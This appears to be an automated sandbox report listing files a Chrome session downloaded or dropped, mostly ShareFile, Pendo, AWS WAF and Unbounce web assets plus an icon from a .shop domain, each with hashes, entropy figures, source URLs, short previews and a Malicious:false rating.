                                                                                                                                                                                                                                                                                SHA-256:84A8C46531E62283B150502F3D58DD741F1F7317F4DA6AF6F55236E16AABAA80
                                                                                                                                                                                                                                                                                SHA-512:6EA1AA19AAAC0AF53428D2E09901AD96109AB999BC7C05C57AD1DC5C7EA53D5B6741E739210BF3B0B776A103BE8E8B22D189C87F8A6459428FF7AF08426FC904
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:http://builder-assets.unbounce.com/published-css/main-ebbfc5e.z.css
                                                                                                                                                                                                                                                                                Preview:....oB.f..main.css..[.8...O.v.FWu....p....}.....H6........W..%$.\{.DL.....K.....H.....:.....0"pA....MY..".AR..L.....{Z...'P.q.%...)...r......Dfvx@\..J..%....Aw.#)*...//......^....)J.m3l.....).](..p.Yp^.....D.r.o....*.w*~2..\{8.QusH.Y^..a..../.....l.T..Q.....W.......h.P.uR.P.v|@.0.-!.K.......V.E}NNx.W.q.....\;_...x5........r.._...)S8u..OeQQ..;\.a~.......y.)>.{i.S.S..1..=).V.|.M.;7..o-..,.D..3%8GmBOl.......;....0....>..Mo..,......k./'4.F....M!}......):.q..Uz..X.d...J.&..^6.%.I.....\...f.D.. E..^..% }9V.9.quL.....=_......B.B.B.[..`7..,p..."7[...-+..D...mk.Q.....}rf....JW..sA.K3..fh6...-.u0(H.j:.`f.P.(..t.^]...?..O...2...k7..n........NnM."?r._A..p.......w.b.g..t/...H.v..0...w..QZT@.......6..K..4kYDN.<.W-....'......r..'....?bp`........$I.Y.~....a.b........*...t.%...C#v/.{...).........P..N...>.&.+...EB5=..l.e.F.]wE.......\.....D.....B4kK..j...;..vEY.../...ID.)..`.0s.<.y.i.^...[..;.UQ...7..W.#j.-*...c..v...df&.>.....v..!....E.p8.w.gZ.Wy(..
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65476)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):119043
                                                                                                                                                                                                                                                                                Entropy (8bit):5.3912038503798305
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:g3xVjF5wKuU3zGmqnDAcOwFJ5+H344FDt21B7sAhgod64QUdaBzET002nbyOs:awjU2OGyI4Fsz
                                                                                                                                                                                                                                                                                MD5:C6FD21E7E412186282D2436A3067AAD3
                                                                                                                                                                                                                                                                                SHA1:F0D0C2525A1C8140D401068F69FDC1AAF0705C40
                                                                                                                                                                                                                                                                                SHA-256:42A04812F58A260F6D26930F471BDD24E2D7E14573169F7CB622C0F6D7C69DC6
                                                                                                                                                                                                                                                                                SHA-512:71C0ED0DA2626CC4E33EA2157DB00AA4AA2D3DE403A47472420994F5AFE3E0F649CA58D1C015247EAF0D22D9887358D2D5801DE369596168D466C2872B4E77FB
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-view-user-pilet/1.8.0/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevviewuserpilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.Button=e.Button,r.Card=e.Card,r.Checkbox=e.Checkbox,r.Col=e.Col,r.ConfigProvider=e.ConfigProvider,r.DatePicker=e.DatePicker,r.Divider=e.Divider,r.Dropdown=e.Dropdown,r.Empty=e.Empty,r.Flex=e.Flex,r.Form=e.Form,r.Grid=e.Grid,r.Input=e.Input,r.InputNumber=e.InputNumber,r.Layout=e.Layout,r.List=e.List,r.Menu=e.Menu,r.Modal=e.Modal,r.Popconfirm=e.Popconfirm,r.Radio=e.Radio,r.Result=e.Result,r.Row=e.Row,r.Select=e.Select,r.Skeleton=e.Skeleton,r.Slider=e.Slider,r.Space=e.Space,r.Spin=e.Spin,r.Switch=e.Switch,r.Tabs=e.Tabs,r.Tag=e.Tag,r.Tooltip=e.Tooltip,r.Typography=e.Typography,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},func
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65479)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):177072
                                                                                                                                                                                                                                                                                Entropy (8bit):5.423535879068629
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:exZgYtWppRoZcOI449yoDlPbOG4rlAU/Xe:exqmWppRoj549yuCG4rl5/O
                                                                                                                                                                                                                                                                                MD5:7D92FBD2815614ECB19DAA886755ADB5
                                                                                                                                                                                                                                                                                SHA1:9D7524C2891A91FDFC861A25D965F789210AB459
                                                                                                                                                                                                                                                                                SHA-256:8EFD1D68765A5A418325D4094D686B9049EF6C4DECBF8A6B41C0774221F40C49
                                                                                                                                                                                                                                                                                SHA-512:433D52D8A05680EB8A8984A72582FC1DA6482F672767486BD259A56B996C839FD7E94FDD2F80DE54FF23F434473FF2E7D00CC1112C812DFD0429AB065B0C0E80
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevtaskmgtpilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={};return Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProperty(i,"__esModule",{value:!0}),{setters:[function(e){n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.Button=e.Button,r.Card=e.Card,r.Col=e.Col,r.Divider=e.Divider,r.Empty=e.Empty,r.Flex=e.Flex,r.Input=e.Input,r.Layout=e.Layout,r.Menu=e.Menu,r.Popconfirm=e.Popconfirm,r.Result=e.Result,r.Row=e.Row,r.Select=e.Select,r.Skeleton=e.Skeleton,r.Space=e.Space,r.Spin=e.Spin,r.Tabs=e.Tabs,r.Typography=e.Typography,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){i[t]=e[t]}))},function(e){a.__assign=e.__assign,a.__awaiter=e.__awaiter,a.__generator=e.__generator,a.__makeTemplateObject=e.__makeTemplateObject,a.__spreadArray=e.__spreadArray}],execute:function(){e((()=>{var
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65479)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):199868
                                                                                                                                                                                                                                                                                Entropy (8bit):5.41109186682965
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:exZgYtWppRoZcOI449yoDlPbOG4rlAU/XIdlT2pm:exqmWppRoj549yuCG4rl5/eT2M
                                                                                                                                                                                                                                                                                MD5:114E798D503A347AAB2A537702E1593F
                                                                                                                                                                                                                                                                                SHA1:EDC8A8C19A54D81944F8EA870D826E06A7362161
                                                                                                                                                                                                                                                                                SHA-256:091AB89F90FE0DBAEDE5C8C9C5308C702C75D49A9CD809CECB9F001F98788C38
                                                                                                                                                                                                                                                                                SHA-512:06CE751BE294ABF4D171F9A9BA070FEBB75A29E45615125F3AD8E9D1905A8484E990CB7CD97092F2953E3FBF1596B4617933FF85C3EA74F40C5FB94237E80DC3
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-task-mgt-pilet/1.7.0/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevtaskmgtpilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={};return Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProperty(i,"__esModule",{value:!0}),{setters:[function(e){n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.Button=e.Button,r.Card=e.Card,r.Col=e.Col,r.Divider=e.Divider,r.Empty=e.Empty,r.Flex=e.Flex,r.Input=e.Input,r.Layout=e.Layout,r.Menu=e.Menu,r.Popconfirm=e.Popconfirm,r.Result=e.Result,r.Row=e.Row,r.Select=e.Select,r.Skeleton=e.Skeleton,r.Space=e.Space,r.Spin=e.Spin,r.Tabs=e.Tabs,r.Typography=e.Typography,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){i[t]=e[t]}))},function(e){a.__assign=e.__assign,a.__awaiter=e.__awaiter,a.__generator=e.__generator,a.__makeTemplateObject=e.__makeTemplateObject,a.__spreadArray=e.__spreadArray}],execute:function(){e((()=>{var
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65474)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):199512
                                                                                                                                                                                                                                                                                Entropy (8bit):5.361186797681031
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:Hcw12O6Q3jpptl874SyaDlInKIIbQxkLh1Qkr/:8wkOLjpptlm4Sy3KVb/N
                                                                                                                                                                                                                                                                                MD5:38596D901C05CDCB1B7DB1F4D6D21BA7
                                                                                                                                                                                                                                                                                SHA1:8A86524AAEE7B7462081A6A3C6F9FBCF6174C80A
                                                                                                                                                                                                                                                                                SHA-256:159C798B7CB0A3F271E179FBFF2D2862394D1F2832F248D6F71802C7F253C04E
                                                                                                                                                                                                                                                                                SHA-512:3FFB8DF04864002AE61D41DCF30B55BDBB3285E0843425EDDD0BFB2258CEA89FE540123F98F5B896673C3E41A5D096123E87BB6E519FD3B8639C10438ABD9D7D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-entitlements-pilet/0.1.54/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledeventitlementspilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.Button=e.Button,r.Card=e.Card,r.Col=e.Col,r.Divider=e.Divider,r.Flex=e.Flex,r.Image=e.Image,r.Layout=e.Layout,r.Row=e.Row,r.Skeleton=e.Skeleton,r.Space=e.Space,r.Spin=e.Spin,r.Typography=e.Typography,r.notification=e.notification,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){i.useHistory=e.useHistory,i.useLocation=e.useLocation},function(e){a.__awaiter=e.__awaiter,a.__rest=e.__rest}],execute:function(){e((()=>{var e,s,u,c,l={439:(e,t,n)=>{"use strict";n.d(t,{z1:()=>k,cM:()=>y});var r=n(2456),o=n(6250),i=2,a=.16,s=.05,u=.05,c=.15,l=5,f=4,d=[{index:7,opacity:.15},{index:6,opacity:.25},{index:5,opacity:.3},{index:5,opacity:.45},{in
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):20
                                                                                                                                                                                                                                                                                Entropy (8bit):3.446439344671015
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:YMb1gXMR4n:YMeXNn
                                                                                                                                                                                                                                                                                MD5:2E1E0B28D6E7522CB687E20D37BCD8AA
                                                                                                                                                                                                                                                                                SHA1:03D5EFE3719CAB433421C4D9BF6C73E0B8EB69E5
                                                                                                                                                                                                                                                                                SHA-256:124CE91528D8ACB894BDC980ABDDF035B38CDC64CE13F088D431E0B10D61FB24
                                                                                                                                                                                                                                                                                SHA-512:70BB31CA0F3907AB6B5860459643E422AAD6685F32D519C23E671CD46F29ABF2DB1F0C53E54313FF6FE7B54A75CDCA18A9232556B3273E6DB200BFCD22BA82BD
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://api.ipify.org/?format=json
                                                                                                                                                                                                                                                                                Preview:{"ip":"8.46.123.33"}
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):19
                                                                                                                                                                                                                                                                                Entropy (8bit):3.6818808028034042
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:uZuUeZn:u5eZn
                                                                                                                                                                                                                                                                                MD5:595E88012A6521AAE3E12CBEBE76EB9E
                                                                                                                                                                                                                                                                                SHA1:DA3968197E7BF67AA45A77515B52BA2710C5FC34
                                                                                                                                                                                                                                                                                SHA-256:B16E15764B8BC06C5C3F9F19BC8B99FA48E7894AA5A6CCDAD65DA49BBF564793
                                                                                                                                                                                                                                                                                SHA-512:FD13C580D15CC5E8B87D97EAD633209930E00E85C113C776088E246B47F140EFE99BDF6AB02070677445DB65410F7E62EC23C71182F9F78E9D0E1B9F7FDA0DC3
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:404 page not found.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):1096693
                                                                                                                                                                                                                                                                                Entropy (8bit):5.13387094494345
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12288:zAzFOItthHPNqH8LzgYnpL7CoTDUwFH371EbIj8R2drzFmhbvAMw60FJIW9hDrs+:zAzXthvNqY/L1iC+vAx60UYDgrS
                                                                                                                                                                                                                                                                                MD5:43E67BD2C75E25FCB703D40964EFDC4A
                                                                                                                                                                                                                                                                                SHA1:58EB6EE37B42E0FBB19DC5437635196B299F98D9
                                                                                                                                                                                                                                                                                SHA-256:D42CB6D6D922F834E858B9DE9CB00E525C5EA70148DE4D8E3EF85AA25D2481A8
                                                                                                                                                                                                                                                                                SHA-512:F396FDD4338B9B8F8650CAA0F99887F2ED44C69ADA90289AAA4C6941860FD58CF0FD9909D657AC95665763219659B00C3391B51807B5CDE3D63D5EFE5B2CB176
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://0093b71e39a6.11de9b12.us-east-1.token.awswaf.com/0093b71e39a6/478ed03bbf12/challenge.js
                                                                                                                                                                                                                                                                                Preview:var a0_0x2f87=['nonRepudiation','PUBLIC\x20KEY','key','encryptionParams','1VhORTK','24872iccYnq','Comment:\x20','totalFocusTime','close_notify','crcCalculator','getCipherSuite','DoNotTrackCollector','firstChild','Could\x20not\x20add\x20PKCS#7\x20signer;\x20unknown\x20message\x20digest\x20algorithm:\x20','TelemetryAcquisitionTime','_input','listAllCertificates','crc32','_tagLength','Gadugi','pools','ContentType','Updating\x20cookie\x20with\x20domain:\x20','none','detached','GesturalTelemetryCollector','getMetrics','EncryptedData.Version','endEvent','SimHei','KramerAndRio','EncryptedContentInfo.contentType','critical','WEBGL_DEBUG_EXTENSION','execute','MS\x20UI\x20Gothic','createClientKeyExchange','lastCollection','collect','shouldRefreshToken?\x20','makeLogger','Goudy\x20Old\x20Style','startEncrypting','putInt16','calculate','rsa','order','messageToPem','href','black','transition','createKeyPairGenerationState','FreesiaUPC','client_write_MAC_key','getTime','WST_Czec','aes256','Mangal','
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):17174
                                                                                                                                                                                                                                                                                Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://hrv56k8ryi.ferrovelho.shop/m/ic/RURBAM6XT5AFWTUO9JJWXDBG5
                                                                                                                                                                                                                                                                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65310)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):505838
                                                                                                                                                                                                                                                                                Entropy (8bit):5.336262263635543
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:+IjjAjO320J8PG/qy/ARkfI4AhxxdEr66CwA1RHup86gJML5QjCKa:+IQO32HG/qy/ARkfhIf1RHaPL5JKa
                                                                                                                                                                                                                                                                                MD5:4B18C063CE90E7A807C836152EC2125D
                                                                                                                                                                                                                                                                                SHA1:F50F322C0305DBA89B4F52BA25505F47233073AD
                                                                                                                                                                                                                                                                                SHA-256:BA4242AA170D5720EB62E50910A824F0F62C65DD30151A1890CC00E1763AA9E9
                                                                                                                                                                                                                                                                                SHA-512:979A904910F97B3925B233EB70A5FA7519F2B55968A0BE6DB70730328D2829587F5F4AF7570AE4D371D63F826F1DE61A7D703FA1FF999D0439FA6E45EB6CCD2A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:// Pendo Agent Wrapper.// Copyright 2024 Pendo.io, Inc..// Environment: production.// Agent Version: 2.249.1.// Installed: 2024-10-09T17:17:44Z.(function (PendoConfig) {./*.@license https://agent.pendo.io/licenses.*/.!function(Hb,jb,Wb){!function(){var A=Array.prototype.slice;try{A.call(jb.documentElement)}catch(Ut){Array.prototype.slice=function(e,t){if(t=void 0!==t?t:this.length,"[object Array]"===Object.prototype.toString.call(this))return A.call(this,e,t);var n,i=[],r=this.length,o=e||0,a=(t<0?r+t:t||r)-(o=0<=o?o:r+o);if(0<a)if(i=new Array(a),this.charAt)for(n=0;n<a;n++)i[n]=this.charAt(o+n);else for(n=0;n<a;n++)i[n]=this[o+n];return i}}String.prototype.trim||(String.prototype.trim=function(){return this.replace(/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,"")});var R=function(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_".split("");return{uint8ToBase64:function(e){var t,n,i,r=e.length%3,o="";for(t=0,i=e.length-r;t<i;t+=3)n=(e[t]<<16)+(e[t+1]<<8)+e[t+2]
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):28
                                                                                                                                                                                                                                                                                Entropy (8bit):3.950212064914748
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:WZoS8/ZYn:WZoS8/ZYn
                                                                                                                                                                                                                                                                                MD5:C3F64CB2A8B00CBBC30CE2908208A29D
                                                                                                                                                                                                                                                                                SHA1:E4AA7CAB67F4CF5FA52371DDC25A75AAFD4D0CCC
                                                                                                                                                                                                                                                                                SHA-256:391601283994BCD9486160BF8A5637410D280E1BDDD3AEF5428454976E193E81
                                                                                                                                                                                                                                                                                SHA-512:6CCBC26128FE65D6D313B965DA3D2E201D506442D0036404ABB490BE0FC99B3A0FDB611269B932DBA7F3A621E11F79ED213D2B11D487EE39C54A17D97A823552
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwmdgKtPdzbRmxIFDZFhlU4SBQ2RYZVO?alt=proto
                                                                                                                                                                                                                                                                                Preview:ChIKBw2RYZVOGgAKBw2RYZVOGgA=
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):13593
                                                                                                                                                                                                                                                                                Entropy (8bit):4.97280201927415
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:TAnCInAOgwRlshkByQhvWAa4nhpI4wRls0rqP+rCW7UCg6YiYBBCW7UC/6YiYiyX:cn3gQh3huEP+rCWUXBBBCWzXBpaVI
                                                                                                                                                                                                                                                                                MD5:79E997CA126B2522CDB04FE90DF21752
                                                                                                                                                                                                                                                                                SHA1:9240FE86112391FE95C34F1E49E26C7FBC2B4722
                                                                                                                                                                                                                                                                                SHA-256:4B3A8A6F91F2F2B51FB6AB816435BD3E3B0C6622D005BA080333F49444083C85
                                                                                                                                                                                                                                                                                SHA-512:F97040E83A072F3385197118C0628C0F24693EF3C2AA98FE1F85DA80AF87A0D36825DD20301FC152E3B67011C1D83A2F08EC96C2785CC8BF54EC0AD0ABB0B2EE
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://citrix-sharefile-content.customer.pendo.io/guide.-323232.1622565221517.css
                                                                                                                                                                                                                                                                                Preview:/* ------------------------------. * -- Main Global Styling -------. * ------------------------------ */...\_pendo-guide\_ {. /* -- Overarching settings for all guides -- */.}...\_pendo-guide-container\_ {. -moz-box-shadow: 1px 1px 1px 0 rgba(0,0,0,0.2);. -webkit-box-shadow: 1px 1px 1px 0 rgba(0,0,0,0.2);..box-shadow: 1px 1px 1px 0 rgba(0,0,0,0.2);. /*padding: 40px 20px;*/. font-family: "citrixsans-regular","CitrixSans",CitrixSansRegular, Arial, sans-serif;.}...\_pendo-guide-container\_ .\_pendo-guide-content\_ {. /* -- Content area -- use for font attributes, padding, etc. */.}...\_pendo-guide-container\_ .\_pendo-guide-content\_ .pendo-header {. font-size: 24px;. .line-height: 31px;. color: #485164;. text-align: center;. .font-family: "citrixsans-semibold","citrixsans-regular","CitrixSans",CitrixSansRegular, Arial, sans-serif;. font-weight:600;. .margin-bottom: 16px;. .padding: 0;.}...\_pendo-guide-container\_ .\_pendo-guide-content\_ .pendo-subheader {. font-s
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65477)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):690173
                                                                                                                                                                                                                                                                                Entropy (8bit):5.968276901365447
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12288:T4OQkV53hSjvRAgXqG7DNyp4IEUj8O2dIK9:Akv3hEZXqG7DN1Uj8O2T9
                                                                                                                                                                                                                                                                                MD5:66960F160A996198483C9B80DB9BB067
                                                                                                                                                                                                                                                                                SHA1:3B88BD8104FC9D78F6EFA282846F552C6DCD2902
                                                                                                                                                                                                                                                                                SHA-256:068BB5A28EB54D79EB794121A870099D967C5467E6F174850EF283B4D56F0D1B
                                                                                                                                                                                                                                                                                SHA-512:79DF7E7C84EC5AE68D914DC7F4956D9F4919DBB1867236EB04B5F7AD6E6E13F13EF9B78F5D1D2D3D54C2C3391EC69E2DB69044F3A66601D6256A8E20BA6C0DAD
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevtemplatespilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},a={},s={},i={},o={},l={},u={};return Object.defineProperty(s,"__esModule",{value:!0}),Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(u,"__esModule",{value:!0}),{setters:[function(e){n.ItemsEntity=e.ItemsEntity,n.Uploader=e.Uploader,n.UsersEntity=e.UsersEntity,n.ZoneService=e.ZoneService,n.createFile=e.createFile},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){a.Alert=e.Alert,a.App=e.App,a.Avatar=e.Avatar,a.Button=e.Button,a.Card=e.Card,a.Checkbox=e.Checkbox,a.Col=e.Col,a.Collapse=e.Collapse,a.Divider=e.Divider,a.Drawer=e.Drawer,a.Dropdown=e.Dropdown,a.Flex=e.Flex,a.Form=e.Form,a.Input=e.Input,a.Layout=e.Layout,a.List=e.List,a.Menu=e.Menu,a.Modal=e.Modal,a.Result=e.Result,a.Row=e.Row,a.Select=e.Select,a.Skeleton=e.Skeleton
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (13545), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):13546
                                                                                                                                                                                                                                                                                Entropy (8bit):4.792073494007343
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:/LCNyKY+DjKNf7FXNY8/gSgTI5lSgTIZHyxIEYcmacMSgTIkJSgTId6RaSgTI9VZ:22/tuKLcA5
                                                                                                                                                                                                                                                                                MD5:1711B6CAC451CFDB8E7EF06DAEDB3279
                                                                                                                                                                                                                                                                                SHA1:C413F2ACDD0CDABE881719E8EF54F4B21969F907
                                                                                                                                                                                                                                                                                SHA-256:386F4FDE9CA6B967C1F9968AAA58E104F05A1F66A592D2E46019954E32CAAD24
                                                                                                                                                                                                                                                                                SHA-512:A7F5876FEC9EB2B77A196C04CA8ECE53E9A9A9E5C096E69E7DB70C77E758A6C4C89797B56EAE0B49E391509E7F7CFB89DB543905D534E68EBEEF5983E507B290
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://citrix-sharefile-content.customer.pendo.io/guide-content/u6RYL2wEa9xrpUJMTeOXl41AeJI/qrJmWADnkufXgGqv6M-p2xBSYIU/xBPyrN0M2r6IFxno71T0shlp-Qc.dom.json?sha256=OG9P3pymuWfB-ZaKqljhBPBaH2alktLkYBmVTjLKrSQ
